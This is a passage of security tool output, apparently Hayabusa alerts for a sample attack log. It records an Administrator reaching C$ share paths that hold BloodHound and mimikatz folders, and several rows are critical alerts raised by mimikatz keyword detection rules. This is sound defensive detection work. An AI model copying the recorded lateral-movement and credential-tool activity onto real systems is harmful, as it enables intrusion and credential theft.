Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
-2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
